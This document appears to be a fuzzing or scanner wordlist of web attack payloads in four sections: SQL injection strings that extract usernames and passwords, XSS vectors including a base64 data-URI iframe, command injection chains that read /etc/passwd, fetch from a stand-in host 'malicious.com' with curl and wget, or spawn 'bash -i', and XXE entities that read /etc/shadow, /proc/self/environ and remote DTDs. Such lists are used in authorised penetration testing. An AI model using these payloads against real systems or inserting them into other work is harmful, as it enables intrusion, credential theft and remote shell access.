# SQL Injection (sqli)
sqli
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1'#
' OR 1=1
' OR 'x'='x
' AND 1=1
' AND 'x'='x
' AND 1=2
' AND '1'='2
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL/*
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3/*
' UNION SELECT NULL,username,NULL FROM users--
' UNION SELECT NULL,@@version,NULL--
' AND EXISTS(SELECT 1 FROM users WHERE username = 'admin' AND password = 'password')--
' OR 1=1 LIMIT 1--
' OR 1=1 ORDER BY 1--
' OR 1=1 GROUP BY CONCAT(username,0x3a,password) HAVING 1=1--

# XSS (xss)
xss
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
"><img src="javascript:alert('XSS')">
"><iframe src="javascript:alert('XSS')"></iframe>
"><svg/onload=alert('XSS')>
"><body onload=alert('XSS')>
"><input type="text" value="XSS" onfocus="alert('XSS')">
"><a href="javascript:alert('XSS')">Click me</a>
"><object data="javascript:alert('XSS')"></object>
"><video src="javascript:alert('XSS')"></video>
"><embed src="javascript:alert('XSS')"></embed>
"><style>@keyframes x{from{opacity:0;}to{opacity:1;}}body:after{animation:x 1s;content:attr(data)}</style>
"><a href="javascript:alert('XSS')">XSS</a>
"><button onclick="alert('XSS')">Click</button>
"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFBTJykuYm9keT4="></iframe>
"><input type="text" value="XSS" onblur="alert('XSS')">
"><form><input type="text" name="test" value="<script>alert('XSS')</script>"></form>
"><iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>

# Command Injection (cmd)
cmd
; ls
| ls
&& ls
|| ls
; whoami
| whoami
&& whoami
|| whoami
; id
| id
&& id
|| id
; uname -a
| uname -a
&& uname -a
|| uname -a
; cat /etc/passwd
| cat /etc/passwd
&& cat /etc/passwd
|| cat /etc/passwd
; netstat -an
| netstat -an
&& netstat -an
|| netstat -an
; ps aux
| ps aux
&& ps aux
|| ps aux
; curl http://malicious.com
| curl http://malicious.com
&& curl http://malicious.com
|| curl http://malicious.com
; wget http://malicious.com
| wget http://malicious.com
&& wget http://malicious.com
|| wget http://malicious.com
; echo vulnerable
| echo vulnerable
&& echo vulnerable
|| echo vulnerable
; bash -i
| bash -i
&& bash -i
|| bash -i

# XXE (xxe)
xxe
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://malicious.com/malicious.dtd"> ]>
<root>&xxe;</root>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://malicious.com/malicious.xml"> ]>
<root>&xxe;</root>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/self/environ"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/self/status"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/cpuinfo"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/meminfo"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/version"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/uptime"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/net/tcp"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/net/udp"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/net/route"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/net/dev"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/net/if_inet6"> ]>
<doc>&xxe;</doc>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///proc/sys/kernel/hostname"> ]>
<doc>&xxe;</doc>
